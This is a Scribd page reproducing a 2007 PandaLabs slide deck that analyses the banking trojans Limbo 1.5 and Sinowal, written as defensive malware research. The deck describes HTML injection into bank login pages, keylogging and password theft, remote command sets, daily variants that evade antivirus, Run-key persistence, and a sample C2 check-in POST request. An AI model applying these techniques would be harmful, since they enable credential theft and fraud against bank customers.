Scribd Logo
Upload

Welcome to Scribd!

  • 30 views

    Banking Targeted Attack Techniques

    Uploaded by

    rstsyn
    The document describes two banking malware cases, Limbo 1.5 and Sinowal. [1] Limbo 1.5 uses helper files to inject HTML code onto banking sites and steal passwords. It communicates with a control server to receive commands. [2] Sinowal uses a custom packer and "just-in-time" monitoring to avoid detection. It sends encrypted URLs to a server that responds with injection code without updating the malware. Both cases emphasize evading antivirus through daily variants and advanced techniques.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content

    You might also like

    Banking Targeted Attack Techniques

    Uploaded by

    rstsyn
    30 views20 pages
    The document describes two banking malware cases, Limbo 1.5 and Sinowal. [1] Limbo 1.5 uses helper files to inject HTML code onto banking sites and steal passwords. It communicates with a control server to receive commands. [2] Sinowal uses a custom packer and "just-in-time" monitoring to avoid detection. It sends encrypted URLs to a server that responds with injection code without updating the malware. Both cases emphasize evading antivirus through daily variants and advanced techniques.

    Original Description:

    Nice details about Limbo or NetHell

    Original Title

    Panda eCrime2007

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document describes two banking malware cases, Limbo 1.5 and Sinowal. [1] Limbo 1.5 uses helper files to inject HTML code onto banking sites and steal passwords. It communicates with a control server to receive commands. [2] Sinowal uses a custom packer and "just-in-time" monitoring to avoid detection. It sends encrypted URLs to a server that responds with injection code without updating the malware. Both cases emphasize evading antivirus through daily variants and advanced techniques.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    30 views20 pages

    Banking Targeted Attack Techniques

    Uploaded by

    rstsyn
    The document describes two banking malware cases, Limbo 1.5 and Sinowal. [1] Limbo 1.5 uses helper files to inject HTML code onto banking sites and steal passwords. It communicates with a control server to receive commands. [2] Sinowal uses a custom packer and "just-in-time" monitoring to avoid detection. It sends encrypted URLs to a server that responds with injection code without updating the malware. Both cases emphasize evading antivirus through daily variants and advanced techniques.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 20

    Banking Targeted Pedro Bustamante

    Sr. Research Advisor

    Attack Techniques

    1
    Case I: Limbo 1.5

    • First discovered January 20, 2007 via


    “Targeted Attack Alert Services” of
    PandaLabs.

    • Affects multiple financial institutions.

    • Now detected as Trj/Bakolimb.A

    • Consists of 3 main components


    • Helper.XML
    • Helper.DLL
    • Control Server and Control Panel

    2
    Limbo 1.5
    Helper.XML
    • Configuration file contains code to inject.
    • Defines HTML code injection per institution
    • Optional parameters (block, check, quan, content).

    3
    Limbo 1.5
    Helper.DLL

    Installs as Internet Explorer Browser Helper Object (BHO)


    • Monitors all browsing activity.
    • Monitors CortalConsors.de online broker by default.

    Keylogger Functionality
    • Windows Protected Storage (saved passwords).
    • Deletes cookies.
    • Drops information in a text file.
    • Different dump depending on the variant.

    4
    Limbo 1.5
    Helper.DLL
    • New variants daily to avoid signature detection by AV engines.
    • In a single day it’s normal to see 6 different variants.
    • Small changes between the different variants as shown by Win32 API calls.

    5
    Limbo 1.5
    Helper.DLL Variants

    • Point-and-click utility to
    create variants.

    • User defines download URL


    and runtime packer to use.

    • Can distribute new


    undetected variants very
    easily.

    6
    Limbo 1.5
    Helper.DLL

    • Creates a UniqueID per infected machines.

    • Uses this UID to communicate with the Control Server and to receive
    commands from it.

    • Client <-> server communication via PHP scripts.

    • As soon as it connects send TXT file.

    • Commands.php to execute commands remotely:


    • Download
    • Update
    • DeleteCookies
    • CopyBofAKeys / DeleteBofAKeys
    • Run
    • LoadXML
    • Reboot
    • KillWin
    • KillWinAndReboot

    7
    Limbo 1.5
    Remote Control Panel
    • Filter by COUNTRY, IP or UID.
    • View captured logs, delete logs, execute commands, …

    8
    Limbo 1.5
    Remote Control Panel
    • Command execution and monitorization.
    • Commands are queued in case client is not connected.

    Command executed on 12/3/2007 instructing PCs to download “downloader” which in turn downloads Trj/Spammer.ZO and Adware/Bravesentry.
    9
    Limbo 1.5
    Remote Control Panel
    • Infection logs and statistics.
    • Approximate 2000 new infected PCs per day.

    10
    Limbo 1.5
    Remote Control Panel
    • Trojan “kit” sold customized. We found several servers using this kit.
    • Hidden password functionality.

    11
    Limbo 1.5
    Remote Control Panel
    • Utility to create and print credit cards.
    • Stolen credit card data.

    12
    Case II: Sinowal

    • First discovered March 7, 2007 via “Targeted


    Attack Alert Services” of PandaLabs.

    • Affect multiple financial institutions.

    • Now detected as a Trj/Sinowal variant.

    • Most interesting characteristics:


    • Custom-made runtime packer
    • Trojan-independent monitoring of bank URLs

    13
    Sinowal
    Custom-made Runtime Packer
    • Not detected by internal tools or competing Avs.
    • Unpacking utilities could not unpack it.
    • While investigating manually found typical packer OEP.
    • Manually unpacking reveals new “control and communication servers”.
    • A few days later, brand new & unknown packing algorithm.

    14
    Sinowal
    Remote “JIT” Monitoring Functionality

    • Most Trojans include the bank address to monitor and HTML code to
    inject within its binary code.

    • Sinowal introduces a new technique that helps it:


    • Remain undetected by routinary binary analysis.
    • Update it’s target and code injection without updating the binary.

    • How it works
    1. Upon infection inserts “Shell” into HKLM\...\Run as
    %ProgramFilesRoot%\Common Files\Microsoft Shared\Web Folders\ibm00003.exe
    2. Drops IBM00002.DLL and IBM00003.DLL into the same directory
    which are injected into Explorer.exe process.
    3. Infected client sends visited URL encrypted to malicious server.
    4. Malicious server only responds to specific “User-Agent” string.
    5. Malicious server responds with HTML code to inject.
    6. Unsuspecting user sees modified bank login page.

    15
    Sinowal
    Remote “JIT” Monitoring Functionality

    • Infected client -> malicious server


    • Monitors browsing activity
    • Sends encrypted URL to server
    • POST /gamma/x25.php?
    id=2E0345322FDD1D09C728CC9840F922FA
    &sv=53
    &build=Build%20VASi
    &ts=1130334165
    &ip=192.168.200.27
    &sport=3891
    &hport=4011
    &os=5.1.2600
    &cn=Norway
    HTTP/1.1
    • Static User-Agent: Mozilla/4.0
    • Static Content-Type boundary of “--swefasvqdvwxff”

    16
    Sinowal

    17
    Sinowal

    18
    Banking Targeted Pedro Bustamante
    Sr. Research Advisor

    Attack Techniques

    • Bank-specific custom attacks


    • Evade AV sig detection easily
    • Multiple variants per day
    • Custom runtime packing techniques

    • Control Panels sold as “kits”


    • Remote monitoring of browsing
    19
    Banking Targeted Pedro Bustamante
    Sr. Research Advisor

    Attack Techniques

    Thanks !!
    Panda Research Blog:
    http://research.pandasoftware.com

    20

    You might also like